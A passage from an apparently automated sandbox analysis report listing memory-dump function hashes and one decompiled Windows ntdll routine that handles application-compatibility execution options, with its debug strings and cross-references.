                                                          • Instruction Fuzzy Hash: BA900271A0500012A24171694C146464016ABE0781B55C021A0545554C89948A55A3E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.212088077.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b8b5435ada3328d16d1b9a5434931e6279f52075b70c5bd4aa51c7af509e8b33
                                                          • Instruction ID: e2561301e82270e67f6abec70d7f891f8dfa85b83f608a3ed377ae451cc9517c
                                                          • Opcode Fuzzy Hash: b8b5435ada3328d16d1b9a5434931e6279f52075b70c5bd4aa51c7af509e8b33
                                                          • Instruction Fuzzy Hash: 09900265221000021246A5690A0450B0455ABD6391391C025F1447590CC6618865A361
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.212088077.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 35adbdf6932017b58a6e5a063e646fe695ec9efab7abf6a6b9af4d397c0d4ce9
                                                          • Instruction ID: cfe49f623e318cb542ce5e3a865a937896d23fe001307d52be8655e90f50ffb9
                                                          • Opcode Fuzzy Hash: 35adbdf6932017b58a6e5a063e646fe695ec9efab7abf6a6b9af4d397c0d4ce9
                                                          • Instruction Fuzzy Hash: 72900265211000031206A5690B0450700569BD5391351C031F1046550CD6618861A161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.212088077.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 810c3a25465355c04138bae782ba375760098f65d96c52e92e1e63872b671f87
                                                          • Instruction ID: 773d2778dc8467259886de77418e663aad584267f8fb983b22409e47d37edf84
                                                          • Opcode Fuzzy Hash: 810c3a25465355c04138bae782ba375760098f65d96c52e92e1e63872b671f87
                                                          • Instruction Fuzzy Hash: 0690027120100842E20161694804B4600159BE0341F51C026A0155654D8655C851B561
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.212088077.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: caf8fd9bfc5f7df02c4cbc348dcb7397715572ed23b1e8428ecb5dfdb09c71d4
                                                          • Instruction ID: 1b18bb7ebf4985a1fe1d89210cd1d63bb8dd790e35b63933ab7dd85c463568f6
                                                          • Opcode Fuzzy Hash: caf8fd9bfc5f7df02c4cbc348dcb7397715572ed23b1e8428ecb5dfdb09c71d4
                                                          • Instruction Fuzzy Hash: D390027160500802E2517169481474600159BD0341F51C021A0055654D87958A55B6E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.212088077.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 01d5386001e6e9abdca7a4faf25542374d6ebe98afd13fff20b745ebb2d60b18
                                                          • Instruction ID: 40568eb9cce82f8a2e265eeae2014845f5c5f0812fd232a502a3856d9fd4dd68
                                                          • Opcode Fuzzy Hash: 01d5386001e6e9abdca7a4faf25542374d6ebe98afd13fff20b745ebb2d60b18
                                                          • Instruction Fuzzy Hash: 5D90027120504842E24171694804A4600259BD0345F51C021A0095694D96658D55F6A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.212088077.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6010da8dd31037e0d88f68a36c7679f821afa87dfb5b1ea4c374eaa41f308d70
                                                          • Instruction ID: 231fec821eff354a2640b818d3b2afa05a7ed6fdde836660a6e06cad044f6a6f
                                                          • Opcode Fuzzy Hash: 6010da8dd31037e0d88f68a36c7679f821afa87dfb5b1ea4c374eaa41f308d70
                                                          • Instruction Fuzzy Hash: 1B90026130100003E241716958186064015EBE1341F51D021E0445554CD9558856A262
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.212088077.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cc01aa95728f2a05371f761b05b96f1bfaeea0d13a0d83a2b4048cf40a91f3f6
                                                          • Instruction ID: 40a37a95f365f07569ea185ee0272378452be679f780fa51fbde9fed2cdec828
                                                          • Opcode Fuzzy Hash: cc01aa95728f2a05371f761b05b96f1bfaeea0d13a0d83a2b4048cf40a91f3f6
                                                          • Instruction Fuzzy Hash: FF90026921300002E2817169580860A00159BD1342F91D425A0046558CC9558869A361
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.212088077.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4efab4c3047cb3dfa1c4abadc292bbc33442e91312ff46bf5180ad7987027a36
                                                          • Instruction ID: d9ce752e7a32312a3939176bb8d94f530101acef4cb3165c33e07ba2be6f1b8d
                                                          • Opcode Fuzzy Hash: 4efab4c3047cb3dfa1c4abadc292bbc33442e91312ff46bf5180ad7987027a36
                                                          • Instruction Fuzzy Hash: 5B90027131114402E2116169880470600159BD1341F51C421A0855558D86D58891B162
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.212088077.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2cab4f9ac871bd48c2cafca12020ecef17bf90640669bfee708412a3bf8615ea
                                                          • Instruction ID: 41fc6f2be9d9b3c914add4c375e4b6b746089fedf2e3854bc7eb621d312c9217
                                                          • Opcode Fuzzy Hash: 2cab4f9ac871bd48c2cafca12020ecef17bf90640669bfee708412a3bf8615ea
                                                          • Instruction Fuzzy Hash: 8F90026160500402E2417169581870600259BD0341F51D021A0055554DC6998A55B6E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.212088077.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 304db442758e908d0ac0d34e6161ffae0c45046f23250b01cc32e6a7d1a92b05
                                                          • Instruction ID: 386471ae4f6d682ccc07f0809ab14a9b88e91409d86e81809b2cc46760e0c222
                                                          • Opcode Fuzzy Hash: 304db442758e908d0ac0d34e6161ffae0c45046f23250b01cc32e6a7d1a92b05
                                                          • Instruction Fuzzy Hash: 8490027120100402E20165A9580864600159BE0341F51D021A5055555EC6A58891B171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.212088077.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d4a9421a1efe8ab4d7152fcffdd546a7662f6d198ce4b230b6bf7714adc34f86
                                                          • Instruction ID: 240a83b20047886be21460905a2088b49708005e1e0d0d62ad48d95e1e774a3e
                                                          • Opcode Fuzzy Hash: d4a9421a1efe8ab4d7152fcffdd546a7662f6d198ce4b230b6bf7714adc34f86
                                                          • Instruction Fuzzy Hash: 3F90027130100052A601A6A95C04A4A41159BF0341B51D025A4045554C85948861A161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.212088077.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cfbd89027deef4e67e8eab958a39ac733c713bc89fd794589b70e9fa2852cadc
                                                          • Instruction ID: 73ee08a15299705065822f6f5caabbdc169f7cab45f91853b670c6b23992c82d
                                                          • Opcode Fuzzy Hash: cfbd89027deef4e67e8eab958a39ac733c713bc89fd794589b70e9fa2852cadc
                                                          • Instruction Fuzzy Hash: AE90027120100403E2016169590870700159BD0341F51D421A0455558DD6968851B161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.212088077.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eafcf230f3d9e3f8ce18aa2ad35a1d356b5bc12755c342c4291ab2f3143455c1
                                                          • Instruction ID: e8f363d4695ae5985b52594ee148fd37c23bcbafc696c5441a2b85634ee0dfa5
                                                          • Opcode Fuzzy Hash: eafcf230f3d9e3f8ce18aa2ad35a1d356b5bc12755c342c4291ab2f3143455c1
                                                          • Instruction Fuzzy Hash: 3090026120504442E20165695808A0600159BD0345F51D021A1095595DC6758851F171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.212088077.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8b3870d32b870c94e97e721f8c0a7a41c09e04a5fab8b564a8f9bd7e3ba31645
                                                          • Instruction ID: 498188deabbc0a1771e72910dcc14743ff67d2dc465e8c849df08a0358d301ff
                                                          • Opcode Fuzzy Hash: 8b3870d32b870c94e97e721f8c0a7a41c09e04a5fab8b564a8f9bd7e3ba31645
                                                          • Instruction Fuzzy Hash: 1990027520504442E60165695C04A8700159BD0345F51D421A045559CD86948861F161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.212088077.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction ID: dce6f95e1f134ab0a79cdc3f723e5afd6aecce0543b1d29046b612bf1790e284
                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction Fuzzy Hash:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 63%
                                                          			E00A240FD(void* __ecx) {
                                                          				signed int _v8;
                                                          				char _v548;
                                                          				unsigned int _v552;
                                                          				unsigned int _v556;
                                                          				unsigned int _v560;
                                                          				char _v564;
                                                          				char _v568;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				unsigned int _t49;
                                                          				signed char _t53;
                                                          				unsigned int _t55;
                                                          				unsigned int _t56;
                                                          				unsigned int _t65;
                                                          				unsigned int _t66;
                                                          				void* _t68;
                                                          				unsigned int _t73;
                                                          				unsigned int _t77;
                                                          				unsigned int _t85;
                                                          				char* _t98;
                                                          				unsigned int _t102;
                                                          				signed int _t103;
                                                          				void* _t105;
                                                          				signed int _t107;
                                                          				void* _t108;
                                                          				void* _t110;
                                                          				void* _t111;
                                                          				void* _t112;
                                                          
                                                          				_t45 =  *0xb1d360 ^ _t107;
                                                          				_v8 =  *0xb1d360 ^ _t107;
                                                          				_t105 = __ecx;
                                                          				if( *0xb184d4 == 0) {
                                                          					L5:
                                                          					return E00A6B640(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
                                                          				}
                                                          				_t85 = 0;
                                                          				E00A3E9C0(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
                                                          				if(( *0x7ffe02d5 & 0x00000003) == 0) {
                                                          					_t45 = 0;
                                                          				} else {
                                                          					_t45 =  *(_v564 + 0x5f) & 0x00000001;
                                                          				}
                                                          				if(_t45 == 0) {
                                                          					_v552 = _t85;
                                                          					_t49 = E00A242EB(_t105);
                                                          					__eflags = _t49;
                                                          					if(_t49 != 0) {
                                                          						L15:
                                                          						_t103 = 2;
                                                          						_v552 = _t103;
                                                          						L10:
                                                          						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
                                                          						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
                                                          							_t45 = 1;
                                                          						} else {
                                                          							_t53 = E00A241EA(_v564);
                                                          							asm("sbb al, al");
                                                          							_t45 =  ~_t53 + 1;
                                                          							__eflags = _t45;
                                                          						}
                                                          						__eflags = _t45;
                                                          						if(_t45 == 0) {
                                                          							_t102 = _t103 | 0x00000040;
                                                          							_v552 = _t102;
                                                          						}
                                                          						__eflags = _t102;
                                                          						if(_t102 != 0) {
                                                          							L33:
                                                          							_push(4);
                                                          							_push( &_v552);
                                                          							_push(0x22);
                                                          							_push(0xffffffff);
                                                          							_t45 = E00A696C0();
                                                          						}
                                                          						goto L4;
                                                          					}
                                                          					_v556 = _t85;
                                                          					_t102 =  &_v556;
                                                          					_t55 = E00A2429E(_t105 + 0x2c, _t102);
                                                          					__eflags = _t55;
                                                          					if(_t55 >= 0) {
                                                          						__eflags = _v556 - _t85;
                                                          						if(_v556 == _t85) {
                                                          							goto L8;
                                                          						}
                                                          						_t85 = _t105 + 0x24;
                                                          						E00AB5720(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v556);
                                                          						_v560 = 0x214;
                                                          						E00A6FA60( &_v548, 0, 0x214);
                                                          						_t106 =  *0xb184d4;
                                                          						_t110 = _t108 + 0x20;
                                                          						 *0xb1b1e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
                                                          						_t65 =  *((intOrPtr*)( *0xb184d4))();
                                                          						__eflags = _t65;
                                                          						if(_t65 == 0) {
                                                          							goto L8;
                                                          						}
                                                          						_t66 = _v560;
                                                          						__eflags = _t66;
                                                          						if(_t66 == 0) {
                                                          							goto L8;
                                                          						}
                                                          						__eflags = _t66 - 0x214;
                                                          						if(_t66 >= 0x214) {
                                                          							goto L8;
                                                          						}
                                                          						_t68 = (_t66 >> 1) * 2 - 2;
                                                          						__eflags = _t68 - 0x214;
                                                          						if(_t68 >= 0x214) {
                                                          							E00A6B75A();
                                                          							goto L33;
                                                          						}
                                                          						_push(_t85);
                                                          						 *((short*)(_t107 + _t68 - 0x220)) = 0;
                                                          						E00AB5720(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
                                                          						_t111 = _t110 + 0x14;
                                                          						_t73 = E00A71480( &_v548, L"Execute=1");
                                                          						_push(_t85);
                                                          						__eflags = _t73;
                                                          						if(_t73 == 0) {
                                                          							E00AB5720(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
                                                          							_t106 =  &_v548;
                                                          							_t98 =  &_v548;
                                                          							_t112 = _t111 + 0x14;
                                                          							_t77 = _v560 + _t98;
                                                          							_v556 = _t77;
                                                          							__eflags = _t98 - _t77;
                                                          							if(_t98 >= _t77) {
                                                          								goto L8;
                                                          							} else {
                                                          								goto L27;
                                                          							}
                                                          							do {
                                                          								L27:
                                                          								_t85 = E00A71150(_t106, 0x20);
                                                          								__eflags = _t85;
                                                          								if(__eflags != 0) {
                                                          									__eflags = 0;
                                                          									 *_t85 = 0;
                                                          								}
                                                          								E00AB5720(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
                                                          								_t112 = _t112 + 0x10;
                                                          								E00AA3E13(_t105, _t106, __eflags);
                                                          								__eflags = _t85;
                                                          								if(_t85 == 0) {
                                                          									goto L8;
                                                          								}
                                                          								_t41 = _t85 + 2; // 0x2
                                                          								_t106 = _t41;
                                                          								__eflags = _t106 - _v556;
                                                          							} while (_t106 < _v556);
                                                          							goto L8;
                                                          						}
                                                          						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                          						_push(3);
                                                          						_push(0x55);
                                                          						E00AB5720();
                                                          						goto L15;
                                                          					}
                                                          					L8:
                                                          					_t56 = E00A241F7(_t105);
                                                          					__eflags = _t56;
                                                          					if(_t56 != 0) {
                                                          						goto L15;
                                                          					}
                                                          					_t103 = _v552;
                                                          					goto L10;
                                                          				} else {
                                                          					L4:
                                                          					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
                                                          					goto L5;
                                                          				}
                                                          			}
































                                                          0x00a2410d
                                                          0x00a2410f
                                                          0x00a2411c
                                                          0x00a2411e
                                                          0x00a24158
                                                          0x00a24168
                                                          0x00a24168
                                                          0x00a24126
                                                          0x00a24130
                                                          0x00a2413c
                                                          0x00a804a2
                                                          0x00a24142
                                                          0x00a2414b
                                                          0x00a2414b
                                                          0x00a2414f
                                                          0x00a2416b
                                                          0x00a24171
                                                          0x00a24176
                                                          0x00a24178
                                                          0x00a241d0
                                                          0x00a241d2
                                                          0x00a241d3
                                                          0x00a241a7
                                                          0x00a241ae
                                                          0x00a241b0
                                                          0x00a241db
                                                          0x00a241b2
                                                          0x00a241b8
                                                          0x00a241bf
                                                          0x00a241c1
                                                          0x00a241c1
                                                          0x00a241c1
                                                          0x00a241c3
                                                          0x00a241c5
                                                          0x00a241df
                                                          0x00a241e2
                                                          0x00a241e2
                                                          0x00a241c7
                                                          0x00a241c9
                                                          0x00a80628
                                                          0x00a80628
                                                          0x00a80630
                                                          0x00a80631
                                                          0x00a80633
                                                          0x00a80635
                                                          0x00a80635
                                                          0x00000000
                                                          0x00a241c9
                                                          0x00a2417d
                                                          0x00a24183
                                                          0x00a24189
                                                          0x00a2418e
                                                          0x00a24190
                                                          0x00a804a9
                                                          0x00a804af
                                                          0x00000000
                                                          0x00000000
                                                          0x00a804b5
                                                          0x00a804c8
                                                          0x00a804d5
                                                          0x00a804e5
                                                          0x00a804ea
                                                          0x00a804f6
                                                          0x00a80518
                                                          0x00a8051e
                                                          0x00a80520
                                                          0x00a80522
                                                          0x00000000
                                                          0x00000000
                                                          0x00a80528
                                                          0x00a8052e
                                                          0x00a80530
                                                          0x00000000
                                                          0x00000000
                                                          0x00a8053b
                                                          0x00a8053d
                                                          0x00000000
                                                          0x00000000
                                                          0x00a80545
                                                          0x00a8054c
                                                          0x00a8054e
                                                          0x00a80623
                                                          0x00000000
                                                          0x00a80623
                                                          0x00a80556
                                                          0x00a80557
                                                          0x00a8056f
                                                          0x00a80574
                                                          0x00a80583
                                                          0x00a8058a
                                                          0x00a8058b
                                                          0x00a8058d
                                                          0x00a805b5
                                                          0x00a805c0
                                                          0x00a805c6
                                                          0x00a805c8
                                                          0x00a805cb
                                                          0x00a805cd
                                                          0x00a805d3
                                                          0x00a805d5
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00a805db
                                                          0x00a805db
                                                          0x00a805e3
                                                          0x00a805e7
                                                          0x00a805e9
                                                          0x00a805eb
                                                          0x00a805ed
                                                          0x00a805ed
                                                          0x00a805fa
                                                          0x00a805ff
                                                          0x00a80606
                                                          0x00a8060b
                                                          0x00a8060d
                                                          0x00000000
                                                          0x00000000
                                                          0x00a80613
                                                          0x00a80613
                                                          0x00a80616
                                                          0x00a80616
                                                          0x00000000
                                                          0x00a8061e
                                                          0x00a8058f
                                                          0x00a80594
                                                          0x00a80596
                                                          0x00a80598
                                                          0x00000000
                                                          0x00a8059d
                                                          0x00a24196
                                                          0x00a24198
                                                          0x00a2419d
                                                          0x00a2419f
                                                          0x00000000
                                                          0x00000000
                                                          0x00a241a1
                                                          0x00000000
                                                          0x00a24151
                                                          0x00a24151
                                                          0x00a24151
                                                          0x00000000
                                                          0x00a24151

                                                          Strings
                                                          • Execute=1, xrefs: 00A8057D
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00A805AC
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00A804BF
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00A80566
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 00A805F1
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00A8058F
                                                          • ExecuteOptions, xrefs: 00A8050A
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.212088077.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
                                                          • Opcode ID: 6ff1d974fb1eb0315b7db50fcabcd65b532c78dfc28dc8b63e2b2e3b401ebba4
                                                          • Instruction ID: e7c0bc39f5f903e0afb28e52e75c2e6a9c4f1f4c674eb87fbea3984304836826
                                                          • Opcode Fuzzy Hash: 6ff1d974fb1eb0315b7db50fcabcd65b532c78dfc28dc8b63e2b2e3b401ebba4
                                                          • Instruction Fuzzy Hash: EE610C31A00229BADF20EB68FD86FE973B9AF18710F1402B5E505971C1DB709E958F60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.212088077.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $$@
                                                          • API String ID: 0-1194432280
                                                          • Opcode ID: 98a318c763996ce021b8bf61951fc846c8c7648dbbf589d37c4013c19bf38ab2
                                                          • Instruction ID: 268d8d6f2d34791cdab66085c3e1556978006d8a4c5e74002ef3b408ae08418b
                                                          • Opcode Fuzzy Hash: 98a318c763996ce021b8bf61951fc846c8c7648dbbf589d37c4013c19bf38ab2
                                                          • Instruction Fuzzy Hash: B6811871E002699BDB31DF54CD45BEEBAB8AF49714F0481EAAA0DB7240D7705E85CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ABFDFA
                                                          Strings
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00ABFE2B
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00ABFE01
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.212088077.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                          • API String ID: 885266447-3903918235
                                                          • Opcode ID: 6f7e0163ec828fbed7ec1a8b1815ef5265984d09e575b4d53260352fd1fbc5b9
                                                          • Instruction ID: 4c6026f4567993a0dca8f7e8eea1f2696076978149833d754e41f9757770f907
                                                          • Opcode Fuzzy Hash: 6f7e0163ec828fbed7ec1a8b1815ef5265984d09e575b4d53260352fd1fbc5b9
                                                          • Instruction Fuzzy Hash: 20F0C236604601BFDA211A55DD02FB3BB6EEB45730F240614F628565E2DA62F87097E4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%